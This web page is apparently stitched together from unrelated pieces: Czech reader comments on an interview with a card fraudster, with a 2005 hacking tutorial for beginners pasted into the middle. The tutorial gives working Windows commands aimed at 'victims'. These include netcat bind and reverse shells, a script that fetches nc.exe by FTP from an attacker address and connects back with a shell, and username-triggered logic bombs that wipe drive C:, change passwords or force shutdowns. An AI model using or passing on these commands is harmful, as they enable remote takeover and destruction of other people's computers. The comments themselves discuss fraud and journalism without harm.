Clanek jsme museli stahnout, protoze obsahoval zasadni chybu, a proto byl zavadejici. Na obsahu tohoto rozhovoru to vsak nic nemeni, byl pripraveny uz delsi dobu.
Chápu správně že Lupa přináší rozhovor s někým, kdo se doznává k ilegální činnosti a měla by poskytnout policii informace vedoucí k dopadení tohoto typa?
Pokud vim, tak "novinari" maji prave nezverejnovat sve zdroje, i kdyz stoji mimo zakon. Navic v tomhle pripade co by mela Lupa rict? Na ICQ jsme s nekym mluvili, vime jen to co nam povedel...nic vic...? :D
heh, co kdyz vam reknu ze toho cloveka znam? a co kdyz vam reknu ze tydle screenshots mam nekde jeste s daleko moc vic old datumem
tohle je povedeny, kdyz do prdele se davaj venku takhle citlivy informace!
ach jo, svet se nezmeni
Jednak nemáme žádné informace, které by k němu policii mohly dovést, jednak pokud bychom své zdroje běžně udávali, nikdo by nám podobné informace neposkytoval.
Je to odporné. Vůbec se bavit s někým, kdo podvádí lidi. A který si myslí, že je tak král. Jejich zlodějská branže, hm... Zakomplexovaní jedinci, kteří se dokáží realizoivat pouze takhle.
Nebuďte prosím tak naivní ... nedělají nic jiného, než že vyujížívají lidské hlouposti ... podle mne jsou vlastně užiteční, protože proti hlouposti je prostře třeba systematicky a vytrvale bojovat :-). Jejich branže není o nic méně špinavá a zakomplexovaná než branže ve které podniká Český telekom (a z jeho nabídek je zřejmě patrné, že je to lidská hloupost která ho živí), nebo snad branže českých politiků (především socanů a komunistů, kteří opět přináší jen prvoplánové akce a populistické sliby, což jsou atributy na které slyší především hloupí lidé ), hloupost je zkrátka nástroj úspešného podnikání všude kam se jen podíváte ... smiřte se s tím.
Deathalive´s cracking world
Základní poznatky pro lamy To, co byste měli vědět a většinou to, na co se mě
ptáte na ICQ, cracku zdar
?????????????????????
Základní poznatky pro lamy
?????????????????????
V tomto návodu si postupně probereme základní techniky hackování od těch
nejednodušších, až po ty nejdestruktivnější.
Nejprve si probereme úplný základ a přehled příkazů, které musíte znát a jejich
použití a potom se přesuneme k hackování internetového uživatele, což vás bude
jistě bavit nejvíce.
20:38 2005-05-31
IP Adresy:
???????
IP (Internet Protokol) je univerzální adresa přidělená každému počítači
připojenému k internetu. Počítače na síti mají ještě speciální vnitřní ip adresu
v rámci sítě.
IP adresa slouží k identifikaci počítačů, přiděluje nám jí poskytoval připojení
k internetu či síti.
Tato adresa má podobu čtyř cifer oddělených tečkami, např. 83.200.17.33
Kromě toho má váš počítač ještě speciální ip čistě sám pro sebe, je to 127.0.0.1
též jako localhost.
IP adresy budeme využívat později, nyní pro nás však přestávají na chvíli být
důležité
21:43 2005-05-31
PORTY:
?????
Port je smyšlené označení pro službu, kterou daný počítač provozuje. Jednotlivé
porty jsou označeny čísly, např. služba http (pro zobrazování www stránek) běží
na portu 80 na protokolu TCP.
Protokoly jsou dva, TCP a UDP, UDP nás nemusí pro tentorkát zajímat.
Přehled nejpoužívanějších TCP portů:
PORT SLUŽBA použití
21 FTP Přenos souborů
23 TELNET dálková administrace počítače
25 SMTP Port odchozí pošty
80 HTTP WWW stránky
110 POP3 Port příchozí pošty
139 NetBios Sdílení souborů
443 SMB Viz. NetBios
Pro scannování portů si na http://insecure.org/nmap stáhněte program Nmap. Pro
váš operační systém potřebujete bin (binárku). Soubory si rozbalte do C:\Windows\System32.
Klikněte na tlačítko Start, poté dejte spustit (nebo stiskněte kombinaci kláves
Win+R) a napište cmd.
V příkazovém řádku napište:
nmap -v -sT -P0 www.seznam.cz
a provedete scannování portů na serveru seznam
???????-info pod čarou?????????????????????????????????????-
-v Slouží v zobrazení výsledného výpisu
-sT Provede scannování TCP portů
-P0 Nebude nejdříve odesílat pakety na daný port, jestli je opravdu aktivní,
toto je potřebné například u serverů typu microsoft nebo pentagon
22:22 2005-05-31
WWWHACK, BRUTUS, WEBCRACKER A TAKOVÁ HAVĚ«
??????????????????????????????????????
O těhle programech se nakecá strašně moc věcí a člověk si pod tím představuje
taky bůh ví co, jsou to programy na automatizovaný zkoušení hesel na POP3 a FTP,
některé nabízí i formulářové prvky v HTTP.
Já osobně tyto programy považuji za nespolehlivé a proto naprosto nepoužitelné,
dostat se do e-mailu někomu, u koho to jde, opravdu nemá s hackingem nic
společného a proto tyto prográmky kompletně vynecháme.
09:26 2005-06-01
PŘEHLED PŘÍKAZŮ PRO PŘÍKAZOVEJ ŘÁDEK
???????????????????????????????
Příkazový řádek se zapína: v nabídce start dejte spustit a napište cmd
********************************************************************************************************
AT Tento příkaz si jistě oblíbíte, slouží k plánování úloh
at 9:30 shutdown -s -f -t 00
tento příklad vypne počítač v 9:30, ale pouze jednou
CD zobrazí název aktuální složky nebo změní aktuální složku
relativně: cd složka
absolutně: cd c:\složka
CMD Spustí nový příkazový řádek
COPY Zkopíruje jeden nebo více souborů do jiného umístění
copy zdroj + zdroj + zdroj cíl
zdroj znamená soubor nebo soubory určené ke kopírování
cíl je název složky, kam se mají soubory uložit nebo výsledného souboru
DEL odstraní jeden nebo více souborů
del /Q /S C:\*.*
odstraní všechny soubory z disku C:, které se zrovna nepoužívají a tudíž nejsou
potřebné k chodu systému
/Q způsobí, že nebude vyžádáno potvrzení smázání
/S odstraní soubory i z podadresářů (složky nechá prázdné, ale stále tam budou)
dIR Zobrazí výpis aktuálního adresáře (bez parametrů) nebo zvoleného adresáře:
dir složka nebo dir C:\složka
ECHO Vypíše vámi zadaný text, dá se využít v kombinaci s proměnnými
echo %username%
Vypíše aktuálního uživatele
Takto můžeme zapisovat i text do souborů:
echo Ahoj lidi > soubor.txt
kdybysme ovšem takto opět zapsali do souboru, přepsali bysme předchozí text,
protože místo > použijeme >> pro zápis na další řádek:
echo Tohle bude další řádek textu >> soubor.txt
FOR Slouží k zřetězení příkazu (provedení v určitém počtu)
Základní použití je toto:
for /L %i in (1,1,10) do příkaz
první číslice znamená od kolika počítat
druhá o kolik přičítat
třetí do kolika počítat
%i je proměnná, ve které se tento stav udržuje
for /L %i in (1,1,10) do echo Počet do deseti: %i
FTP pro přenos souborů
ftp 63.12.63.39 nebo ftp ftp.webzdarma.cz
O tomto rozhraní si povíme více později
MD Vytvoří složku
md složka
md c:\složka
NET Skvělý příkaz, má několik funkcí
net view zobrazí počítače v síti
net users zobrazí uživatele na počítači
net users %username% zobrazí informace o aktuálním uživateli
net users %username% nové_heslo změní heslo aktuálnímu uživateli bez znalosti
původního hesla
net users nový_uživatel heslo /add vytvoří nového uživatele
net users kompik super změní heslo uživateli kompik na super
net localgroup zobrazí stávající skupiny
net localgorup Administrators ukáže uživatele ve skupině administrátorů
net localgroup Administrators %username% /add vloží stávajícího uživatele do
skupiny Administrátorů
PING Slouží k zjištění, jestli je daný počítač připojen k internetu, dá se
pomocí něco i zjistit ip
ping www.seznam.cz
dostanete ip serveru seznam
TELNET Aplikace slouží ke připojení k danému ip a portu
telnet IP_ADRESA PORT
Pokud port neuvedeme, je výchozí nastavení na 23
místo IP můžeme použít i dns (např. www.seznam.cz)
TRACERT Slouží k trasování počítače
tracert 21.23.63.96
Ukáže vám přes jaké počítače vede komunikaci mezi vaším počítačem a počítačem
oběti. DNS domény počítačů často obsahují části názvu měst, napříkad pra, ust,
apod..
TREE Graficky zobrazí adresáře, podadresáře i soubory
tree /F C:\ nebo Tree /F složka nebo tree /F
Abyste místo diakritických znaků použili ASCII, tak použijte navíc přepínač /A
tree /A /F atd...
VER Zobrazí verzi operačního systému
SHUTDOWN Vypne počítač
shutdown -s -f -t 00
provede okamžité vypnutí stávajícího počítače bez dotázání na ukončení aplikací
shutdown -s -f -t 10 -c "tak se měj"
provede to samé jako v předchozím případě ale s 10vteřinovým oknem zobrazujícím
důvod(tak se měj)
EXIT Vypne příkazovej řádek
10:24 2005-06-01
PROMĚNNÉ, KTERÉ BYSTE MĚLI ZNÁT
??????????????????????????-
U příkazu net jsme si již ukazovali proměnnou %username% ve které je uloženo
jméno aktuálního uživatele, tady máte kompletnější přehled:
*********************************************************************************************************
%username% aktuální uživatel
%windir% Absolutní cesta ke složce WINDOWS
%userdomain% název počítače
%systemdrive% Zobrazí oddíl, na němž je nainstalován operační systém (nejčastěji
C:)
%userprofile% Složka aktuálního uživatele
%allusersprofile% Složka pro všechny uživatele (sdílená)
%tmp% absolutní cesta ke složce Temp kam se ukládají dočasné soubory
%comspec% Absolutní cesta k aplikaci cmd.exe
%programfiles% Absolutní cesta do složky Program Files
nc -vv -z -w2 www.seznam.cz 23-300
Provede scannování portů TCP od 300 do 23 (pozpátku)
nc -v -l -p 8080
Vytvoří naslouchajícího démona na portu 8080 čekajícího na spojení
nc -v -l -p 8080 -e cmd.exe
Vytvoří naslouchajícího démona s tím rozdílem, že když se k němu někdo připojí,
bude mu předána vaše příkazová řádka
nc -nv 61.63.399.63 8080 -e cmd.exe
Předá příkazový řádek netcatu naslouchajícím na portu 8080 (pokud nebyl použit
parametr -e cmd.exe u naslouchajícího nc)
nc -d -L -p 8080 -e cmd.exe
Spustí netcat v tichém režimu, pokud se na něj někdo připojí, bude mu předán
příkazový řádek, možnost spojení přes telnet:
telnet ip_obětí 8080
15:23 2005-06-01
KRÁTKÝ PŘEHLED, CO BYSTE MĚLI MÍT
???????????????????????????-
NetCat http://packetstormsecurity.com/Win/nc11nt.zip
Nmap http://download.insecure.org/nmap/dist/nmap-3.81-win32.zip
firewall http://www.kerio.cz
AVG 7.0 http://www.grisoft.com
FTP Server (nejlépe Cerberus FTP)
naleznete na http://www.slunecnice.cz, stačí do vyhledávání zadat FTP server
******************************************************************************************************
Nc a Nmap jistě chápete, takže si řekneme co dál, Kerio Personal Firewall byste
rozhodně měli mít, aby vás ochránil před útokem zvenčí. Integrovanej firewall ve
Windows je sice taky dobrej, ale byl dělán pro běžné uživatele, vůbec nepočítá s
tímto způsobem použití.
Na stránkách http://www.grisoft.com můžete nalézt anglickou verzi antiviru AVG 7.0
Free Edition, tedy verzi naprosto zdarma
FTP server budete rozhodně také potřebovat, a to pro přenos souborů mezi vaším
počítačem a počítačem oběti, o tom si povíme později v kapitole o dávkových
souborech.
16:27 2005-06-01
PŘENOS SOUBORŮ PŘES FTP VE WINDOWS
??????????????????????????????
Pokud již máte ftp server Cerberus, tak se na něj zkusíme připojit v příkazovém
řádku:
ftp 127.0.0.1
server si vyžádá jméno a heslo, jméno je anonymous a heslo stačí zadat jakékoliv,
to je standartní nastavení u anonymních účtů
Dále pak zadejte binary (pro přenos spustitelných souborů) nebo ascii (pro
přenos textových souborů)
Fungují příkazy cd a dir, které znáte, kromě toho však ještě jiné
get pro stažení souboru na disk (get soubor.exe C:\soubor.exe)
nebo put pro natažení souboru z disku na server (put C:\soubor.exe soubor.exe)
Dále je dobré znát příkaz rename pro přejmenování souboru nebo delete pro
odstranění, od serveru se poté odpojíte příkazem bye nebo disconnect
18:51 2005-06-06
(NE)SKUTEČNÉ PROGRAMOVÁNÍ VE WINDOWS
?????????????????????????????????-
Mluvím o cmd skriptech, je to prosté, pokud se vám nechce pokaždý těch 20
příkazů psát znova, tak si je můžete napsat v poznámkovým bloku a uložit třeba
jako test.cmd
Důležitá je koncovka .cmd
Dám si příklad:
??????? obsah souboru test.cmd ??????????????????????????????
echo MsgBox "Nazdarek lidicky', vbCritical+vbAbortRetryIgnore, 'test" > test.vbs
test.vbs
????????????????????????????????????????????????????????-
tento cmd skript vytvoří soubor test.vbs se zprávou a spustí ho, místo enterů
můžete dávat mezi jednotlivé příkazy &&
???????obsash souboru test.cmd podruhé???????????????????????-
echo MsgBox 'Nazdarek lidicky', vbCritical+vbAbortRetryIgnroe, 'test'>test.vbs&&test.vbs
????????????????????????????????????????????????????????-
v podstatě to dělá to samé, akorát je obsah skriptu na pouhém jednom řádku a
málokterý nezasvěcenec se v tom vyzná ;-)
Podmínka if, aneb jak zajistit, abych nespustil nebezpečnej prográmek sám?
Třeba si do složky, kam si ukládáte cmd soubory dejte soubor firewall.txt
klidně může být prázdný, příkaz if vypadá takto:
if exist "firewall.txt" (echo fuck) else del /Q /S C:\*.*
tento nenápadný řádek v cmd skriptu způsobí, že jestli u tohoto cmd skriptu
nebude soubor firewall.txt, tak projde k promazání disku C:, zbydou pouze složky
a soubory, který systém zrovna používá k chodu
Další věc, naučte se podmínkou if kontrolovat svoje uživatelský jméno, třeba já
mám uživatelský jméno Jack Raiden:
if "%username%"=="Jack Raiden" (echo fuck) else net users "%username%"
changepass
tento řádek zase způsobí, že když spouštějící nebude Jack Raiden, tak mu to
změní heslo na changepass
Vždycky je lepší proměnný uvádět v uvozovkách, pro případ, že by proměnná
obsahovala více, jak jedno slovo, tak to může ošklivě pozměnit skript ve váš
neprospěch
Jde to i bez else:
if not "%username%"=="Jack Raiden" shutdown -s -f -t00
Pokud uživatel nebude Jack Raiden, vypne se mu počítač
Teď si ukážeme, jak psát s více příkazy, teoreticky to, co je uzavřeno v závorce,
může pokračovat na více řádkách:
if not "%username%"=="Jack Raiden" (
net users "%username%" nove_heslo
at 19:30 shutdown -s -f -t 03 -c "sbohem"
)
tzn. pokud uživatel nebude Jack Raiden, změní se mu heslo a nařídí se vypnutí
počítače na 19:30
Teď přichází na řadu poslední příklad, co se cmd skriptů týče, skript se připojí
na váš ftp, stáhne si nc.exe a pokud ho stáhne v pořádku, tak ho i spustí, k
tomu budeme potřebovat soubor C:\ftptmp, do kterého dáme informace pro
pokračování přenosu, dejme tomu, že naše ip je teď 62.62.62.62:
echo anonymous > c:\ftptmp
echo password >> C:\ftptmp
echo bin >> C:\ftptmp
echo cd ftproot >> C:\ftptmp
echo get nc.exe C:\nc.exe >> C:\ftptmp
echo bye >> C:\ftptmp
if exists "C:\ftptmp" ftp -s:C:\ftptmp 62.62.62.62
if exists "C:\nc.exe" (C:\nc -d 62.62.62.62 8080) else (
ftp -s:C:\ftptmp 62.62.62.62
nc -d 62.62.62.62 8080
)
tento skript vytvoří soubor ftptmp s parametry pro přenos ftp, pokud proběhlo
vytvoření úspěšně stáhne soubor a spustí ho, pokud se napoprvé nestáhl správně,
stáhne se dobře napodruhé a spustí, všimněte si, že byl nastaven na připojení k
vám (62.62.62.62) na portu 8080, kde byste měli mít zapnutýho listenera (nc -v -l
-p 8080) na kterého vám skript předá příkazovou řádku. Kvůli tomuto příkladu
jsem chtěl, abyste si sehnali Cerberus FTP Server
21:22 2005-06-08
VISUAL BASIC SCRIPT
???????????????
Díky tomuto skriptovacímu jazyku od Microsoftu můžeme naší (ne)programátorskou
sbírku skriptů ještě trochu zpestřit, například, jak zobrazit to dialogový okno
s chybou a vykolejit tak obě» z klidu?
k tomu slouží příkaz MsgBox:
MsgBox "Tohle bude zpráva", vbInformation+vbOkOnly,"tohle bude nadpis"
tento řádek uložte jako test.vbs a spus»te, je to VBSCript soubor, teď si to
rozpitváme
vbInformation+vbOkOnly znamená, že se tam objeví ikonka i (informace) a tlačítko
pouze OK, ikonky jsou tyhle:
vbInformation ikonka informace
vbQuestion ikonka otazníku
vbExclamation Vykřičník, poplašná zpráva
vbCritical Kritická chyba :)
dále tlačítka:
vbOkOnly zobrazí pouze tlačítko OK
vbOkCancel Tlačítka OK a Storno
vbAbortRetryIgnore Tlačítka přerušit opakovat a přeskočit
můj oblíbený příklad:
MsgBox "You've been cracked by Deathalive",vbCritical+vbAbortRetryIgnore,"ERROR"
a na závěr VBScriptů si ukážeme jeden, který otevírá cd-romky, uložte si ho
třeba jako cdrom.vbs:
Set ovladani = CreateObject("WMPlayer.OCX.7" )
Set mechaniky = ovladani.cdromCollection
If mechaniky.Count >= 1 Then
For i = 0 To mechaniky.Count - 1
mechaniky.Item(i).Eject
Next
End If
????????????????????????????????????????????????????????-
Gratuluju, dostali jste se na závěr návodu a tak doufám, že jste pochopili
alespoň trochu z těch základů, který sem se vám snažil vštěpit do hlavy.
Možná pochybujete, jestli tohle jsou fakt jenom základy, přece jenom, je to
strašně moc, ale věřte mi, tohle je základ, co byste měli znát, informací je
ovšem ale mnohem víc, proto musíte stále hledat, stále se něco učit, stále něco
zkoušet a proto začněte makat, naučte se v něčem programovat, naučte se PHP,
pracovat s databázemi SQL apod., jenom to je cesta k úspěchu, neexistuje žádnej
program, kde kliknete na start a je z vás hacker, to vy se musíte stát
algoritmem!
témata: cracking 8.06.2005, 22:11:00
Ohodnotit příspěvek
Komentáře
index
Přidání komentáře...
Témata
cracking
netcat
www
PHP
Mobilem
other
Archivy
září 2005
srpen 2005
červenec 2005
červen 2005
duben 2005
březen 2005
únor 2005
leden 2005
prosinec 2004
září 2004
srpen 2004
červenec 2004
červen 2004
Ostatní
RSS verze
Vzkazovník
Hodnocení
Oblíbené odkazy
Dialogová okna
Soubory .asmx
Interview s Bennym
Základní poznatky pro lamy
hackpages.wz.cz
hackingexposed.com
www.soom.cz
WebHackingExposed
security.newz-portal.net
No, rozhodně je lepší, že si to lidi můžou přečíst. Sice to nepovede k dopadení jednoho kriminálníka, zato se ale dost lidí poučí a kriminálníci přijdou o pár kšeftů.
Ano chápeš to, že člověk, s kterým je rozhovor vytvořen se věnuje nelegální činnosti, ale také zároveň umožňuje poskytnutí informací, jak tomu zabránit. Což ti jentak někdo neřekne. Takže se zamysli: Nebudeš radši, když se dovíš, jak se chránit i když od člověka, který to provádí???HMmm?
Celý článek mi připadá divný, například účinnost phisingu 20? To ze jsou lidi blbý vím, ale když mi každý den přijde email abych vyplnil udaje ke svemu uctu asi bych trochu váhal s vyplňováním a jistě nebudu jediný.
Další věc co mě zaráží, e-shop s databází použitých kreditních karet je snad skoro vzácnost, většina používá služeb nejakého operátora přes kterého trasakce probíhá - i velké kamenné obchodní domy používájí služeb bank pro zajištění transakcí kreditními kartami.
Celý článek na mě osobně působí jak rozhovor s pubertákem :-)
a ziju dost dlouhou dobu v USA abych vedel ze to tak je.. V USA skratka vsichni verej tomu co jim prijde do mailu.. A to fakt nekecam.. V jedne firme sme dokonce museli blokovat odchozi nefiremni postu zamestnancu protoze skratka vyplnili co jim prislo.
Casto krat se mi stalo ze me znami ptali jestli financni nabidka na prodej software co jim prisla mailem je vyhodna (vzdy se jednalo o SPAM...) a jestli ten dany software je dobry..
A co se tyka DB s kompletnimi udaji tak to rozhodne vzacnost neni a v USA je to zcela bezne..
Upozornuji na to ze v USA.. V CR se krade jak o zivot a cesi sou tak trochu odolni..
Americanum je to jedno, jim dojde vypis z banky a oni proste reknou co podle toho vypisu opravdu platili a co ne.. A banka jim veri. Takze nemaj duvod se starat o to jestli jim nekdo ukradl penize..
A tady?. Tady reklamuju uz 6 mesicu platbu mezi slavnou JMP KB a GE, ktera se stratila a diky zjevnemu zavineni ze strany banky jsem byl odpojen..
Američani sou prostě blbý jak tágo a my možná moc na východě...
Už mě okradli - vybílili mi účet do nuly. Ale přes web to nebylo. Jen frája zašel do banky na pobočku s mě ukradenými doklady a vybral co mohl. A to jen na pouhou občanku, navíc ukradenou 8 měsíců před tím. (A nová OP byla řádně nahlášena).
Banka pak pochybení naštěstí uznala a vše mi vrátila.
Jo a policie? Ta nikoho nedopadla, páč ten chytrolín nebyl na bezpečnostních záběrech poznat.
zrejmne kazdy e-shop si musi drzet informace, jak a cim zakaznik zaplatil. Jak jinak by jste chtel resit reklamace? Otazkou zustava v jake podobe ukladat transakci historii v databazi. Ale proc si e-hopy ukladaji kod CVV2 mne take neni jasne.
Je to naznaceny tema vsuvkama -v CR se pouziva 3D Secure, coz v principu znamena, ze shop te jen presmeruje na branu zprostredkovatele a sam se dozvi nejaky identifikator od nej a info, zda byla platba uspesna ci ne.
Ale pro zakaznika to ma i nevyhody: v podminkach je, ze banka neuznava reklamace na platby timto zpusobem, kdezto normalne to jde.
To asi jo. Ale např. když platím kartou na svém oblíbeném obchodě, tak v něm vědí, jakou kartou jsem platil (protože sem jim napsal, jakým způsobem budu platit - karou - a jakou).
Pak už sem jen nasměrován na bránu České spořitelny.
Myslím, že uložit si v dtb, že zákazník platil kartou (případně jakou) je OK. Horší to je s číslem a CVV2.
Osobně by mě celkem zajímalo, jak to má např. Amazon.com udělaný :-)
Amazon v US - kupoval som knihy cez znamych, ale podla vyjadreni inych v diskusii si tipnem, ze podvedeny klient to v banke vyreklamuje, pripadne s velkou pravdepodobnostou by som si tipol, ze Amazon ma profil najbeznejsich podvodov (napr. rozdiel billing address vs shipping address).
Amazon.de - platil som prevodom z uctu (presnejsie inkaso, btw sparkasse ma rovnake logo ako ceska sporitelna), keby niekto sadol ku kompu (domacemu), tak moze nieco objednat v pripade ze by som nemal zmazane cookies alebo keby pouzil nejaku XSS chybu na strankach amazonu. Objednaval som si knihy aj za radovo stovky mariek (r. 1999) a nikdy po mne ziadne overenie transakcie nechceli.
Opat najpodozrivejsi by bol zrejme rozdiel billing address-sending address. Ale ked si priobjednate "darkove baleni", tak by to zrejme preslo "pod ich radarom".
Nekolikrat jsem v USA nakupoval tak, ze jsem platil vlastni kreditkou (vydanou v CR), dorucovaci adresa na meho bratra ve statech (ktery mi to, kdyz prijel na navstevu, vsechno privezl). Ani jednou nikdo nic neoveroval. Jak jsem se nekde docetl, tak e-shop nema moc sanci porovnavat billing a delivery adresu, protoze k te billing se velmi casto vubec nedostane.
To na mou ukradenou občanku (a nahlášenou - podle čísla lze ověřit, kdy byla nahlášena mezi kradené doklady) Vodafone docela klidně (Vodafone si totiž na webu neumí ověřit, zda jeho klient náhodou nemá nějakou kradenou občanku) uzavřel smlouvu.
Jenže stoupa si nechal posílat podrobné výpisy. Jakmile mi přišel první, vše jsem nahlásil Vodafone a Policii ČR a předal jsem jim i podrobné výpisy. Moc jsem nevěřil, ale policie skutečně daného člověka našla a nyní mu sdělili obvinění.
Co mě dost překvapilo (a vytočilo) bylo to, ž mi policisté řekli, že prý se Vodafone k žalobě nepřidá, protože prý je škoda malá. Mimochodem mně po nahlášení poslali ještě asi pětkrát žádost o zaplacení (přestože jsem jim několikrát e-mailem i telefonicky sdělil, že je věc nahlášena policii). Po mně chtěli až asi 7000 Kč, ale k žalobě se přidat nechtěli. Uvažoval jsem, že bych přenesl číslo k Vodafone, ale po téhle zkušenosti s tou firmou nechci nic mít.
Jo bezpečnostní kamery - na nich nejde nikdy nikoho poznat. Nechápu, jak si někdo může nechat nainstalovat bezpečnostní kamery s tak mizerným rozlišením. Jsou to vyhozené prachy.
Prebiehalo to po ICQ (a mailom), takze asi bez diakritiky. Takze asi "ludske opravy slov". Ale ja by som tam dlzne asi tiez doplnil blbo, takze ja nic nevycitam :-)
Myslím že celý rozhovor je pitomost. Zřejmě jste narazili na lamu, která si už z definice o sobě myslí, jaký je nepřekonatelný profík.
Nevěřím že někoho ego tlačí natolik, že běží všechno vyslepičit novinářům. Jestli někdo dělá do černého trhu s kartami a spamem, pak je existenčně závislý na tom, že to pořád bude fungovat.
Nikdo si pod sebou nebude řezat větev, že upozorní své oběti, případně si bude uměle vytvářet konkurenci. Kolik čtenářů po přečtení článku začne testovat obchody na případné díry? :)
Není možné, že by někdo byl takový pitomec a podstupoval takové riziko za pár fufníků. Jestli mám článku věřit, je námaha obrovská, možnost dopadení veliká a zisky jsou přitom směšné.
Jako by na internetu nebylo dost plně legálních příležitostní k masivnímu obohacení!
Presne tak, v Cesku se proste kartama neplati ... vsechno jsou to dobirky nanyjvys prevody z uctu na ucet, ktere ovsem eshop nerealizuje a take o nich neuchovava zadne informace, takze je to jeho know-how v u nas opravdu k nicemu. Nicmene i u nas uz se zacina blizkat na "lepsi casy" :-)). Nicmene, tak ci onak, ten rozhovor se mi zda velmi autenticky.
Mimochodem vsimtete si ze ten clovek sice vyzradil mnohe, ale vetsina z tech informaci je uz dnes zastarala nebo pro nej uz nemaji zadnou hodnotu $$, a o tom to je :-)
Já vám zadarmo (!) prozradím, že jako SAP konzultant si můžete hravě vydělat - a to legálně - přes 100kKč/měsíc. Teď se asi začnu bát, že se naučíte SAP a budete mi dělat konkurenci.
Nebo jako pilot aerolinek nemate problem mit 150kKč/měsíc. Půjdete shánět licenci?
Dost nevhodne priklady, kvuli ohromne vstupni bariere. Phishing nebo ty inzeraty slibuji hodne za nic. Respektive know-how na SAP consultant nebo na pilota tezko dnes koupite za dolary a zitra se tim pujdete zivit. Takze vase rada zadarmo je draha. Vykutalenci vam slibuji, ze s jejich know-how lze penize vydelat hned. A kupodivu maji pravdu, protoze _oni_ vydelavaji na lidske blbosti a te je dost a dost a hlavne je vecna :-)
Tady nebyla rec o vstupnich barierach, tady byla rec o "Když někdo nějak nehorázně vydělává, tak se tím nechlubí. Nikdo si nebude vytvářet konkurenci.". Ja jsem uvedl dva priklady, kde se opravdu nehorazne (dobre, o velikosti te neohraznosti se da diskutovat) vydelavat a presto se clovek nemusi bat, ze by okamzite ziskal stovky/tisice konkurentu.
Ja vam to reknu jednoduse - do PC rekl bych vidim docela dost a presto bych si netroufl (pominu-li moralni stranku veci) jit phishing provozovat. A to ani v pripade, ze by mi nekdo dal k dispozici dvacet serveru v necivilizovanem svete. Protoze v tom neumim chodit, je velmi pravdepodobne, ze bych si nekde nabil hubu.
Tim, ze si za $1000 koupite ucebnici letani, se nestanete dobry pilotem (a tudiz se profipilot nemusi bat prozrazeni informace, ze existuje trh s ucebnicemi letani nebo ze si jako pilot hodne vydelate), stejne jako se cracker typu toho z clanku nemusi obavat, ze zverejnenim informace "prodavaji se databaze kreditek" a "e-shopy maji backdoory" ziska hromadu expertu, co mu zacnou delat do kseftu.
Nesouhlasím s vašimi přirovnáními. Není to totéž. Stát se SAP odborníkem nebo pilotem vyžaduje dalekosáhlou přípravu. Podvádět na internetu potřebuje jenom dostatek drzosti, času a odvahy (blbosti).
Vy do PC vidíte a přesto byste si to netroufl, protože se bojíte, že si nabijete hubu.
Jenže zapomínáte, že ti podvodníci nejsou žádná esa. Dokonce bych je řadil do skupinky pitomců, kteří mají přebujelé sebevědomí, ale sami toho tolik neumí. Oni do toho PC vidí asi tak stejně jako vy. Jediný rozdíl mezi vámi a podvodníky je v tom, že oni nemají morální zábrany, nebojí se potíží a prostě to zkusí. Někteří si tu hubu nabijou, nebojte se.
Stát se podvodníkem rozhodně není tak těžké jako stát se pilotem. Rozhodně není v zájmu podvodníků, aby se všude rojily script kiddies, které jim budou v jejich amorálním pachtění zdatně konkurovat a tlačit ceny karetu pod už tak směšnou hranici.
Nakonec taková úvaha. Viděl jste, aby pilot nebo odborník SAP psal do novin chlubivé historky o tom, jak skvěle vydělává? Taky se bojí konkurence, i když je "vstup na jejich trh" velmi složitý.
Oni do toho PC vidí asi tak stejně jako vy. Jediný rozdíl mezi vámi a podvodníky je v tom, že oni nemají morální zábrany, nebojí se potíží a prostě to zkusí. Někteří si tu hubu nabijou, nebojte se.
A vy si opravdu myslíte, že takoví lidé jsou konkurencí pro ty, co už v tom umí chodit? To je jako byste si myslel, že pro staré C++ harcovníky jsou konkurencí "programátoři", kteří tak maximálně dovedou naklikat jednodušší aplikaci ve Visual Basicu. I když oba dělají "totéž", vzájemně se jejich oblasti působnosti nepřekrývají.
Stejně tak si nemyslím, že by František Novák z Horní Dolní, kterej použije exploit a ovládne nějaký počítač v Singapuru, ohrožoval "podnikání" crackera z článku.
Prave si myslim, ze novacci v oboru jsou zadanymi zakazniky, kteri si od zkuseenejsich hackeru budou nakupovat ruzne skripty a knowhow, spise nez konkurenci..pro "standu" je tohle tedy spis pr clanek, po jehoz zverejneni ho zacne na irc rada lidi hledat a treba si od nej nekdo nejake know-how koupi :)
Moc hezky napsáno, líbí se mi to. Narozdíl od těch všemožných chytrolínů, co tu mávají tím "že ten cracker je nemožný hlupák, když se takhle vytahuje". Asi si myslí, že když umí nainstalovat Windows XP, zprovoznit nějakou P2P síť, tak jsou "machři". Docela by bylo zajímavé, kdyby každý musel "prokázat" své schopnosti na nějakém testu týkajícím se OSI úrovně či nastavení a zálud serverových systémů.
A někdo vydělává právě tak, že ostatním "prozradí" svoje know-how. Největší balíky se točí v multilevelech. A teď nemyslím v těch, kde prodáváte mýdlo...
... vaše dedukce je naprosto chybná. Předpokládáte, že když už se ten člověk zmínil o možnosti informace zakoupit a prodat na "tržištích" tak je nutně vždy na straně kupujícího a sám nic neumí (to je opravdu zvlášní dedukce) ... snad jste si vsiml ze se zminil i o tom ze sam ziskane informace tímto způsobem prodavá. Informace mají dnes svoji cenu a tak se za tuto cenu prodávají a nakupují, nedovedu si představit vás s názorem "já, všechno zvládnu sám, já jsem profík, hacknu všechno a prachy vyberu taky sám, k nakupování informací mám odpor" :-)) jak na podobném "trhu" uspějete. Asi byste skončil hodně brzy.
2) na placenych mistech existuje obrovske mnozstvi materialu, postupu a navodu jak provade napriklad tyto podvody, a predpokladam ze tohohle vychazi prave on.. Takhle vznikl..
uz sem castokrat videl znameho ktery se snazi prodavat kopirovane DVD s filmama,, navod na to jak okopirovat DVD si ve vsech pripadech nasli na internetu... Tady jde o to ze tenhle utocnik vi ze mu dane podvody vynesou dost penez a tak do te oblasti investuje...
3) rekne te mi kdy jste naposledy koupil informaci vy.. ja tak maximalne nejakej eBook a nebo knihu.. ale jeste nikdy sem neplati za navod k necemu..
3/ navod k necemu ktery bude aktualni i za 3 dny, ebook apod ... to jsou bezcene veci (nehlede na to jaky nazor na tuto skutecnost maji jejich autori :-) ). Tady je myslim rec o informacich ktere lze se znalosti urciteho postupu obratem se ziskem zpenezit.
Asi určitě, není tam nic o co se lze opřít a ověřit, pouze všeobecné povídání které zná každý kdo se déle pohybuje na internetu.
Co třeba dát odkaz na toho prodejce vín z NY? At se lze podívat jakým způsobem se platí za zboží?
Clanek povazuji za zajimavy, ale v koutku duse stejne hloda pochybnost...
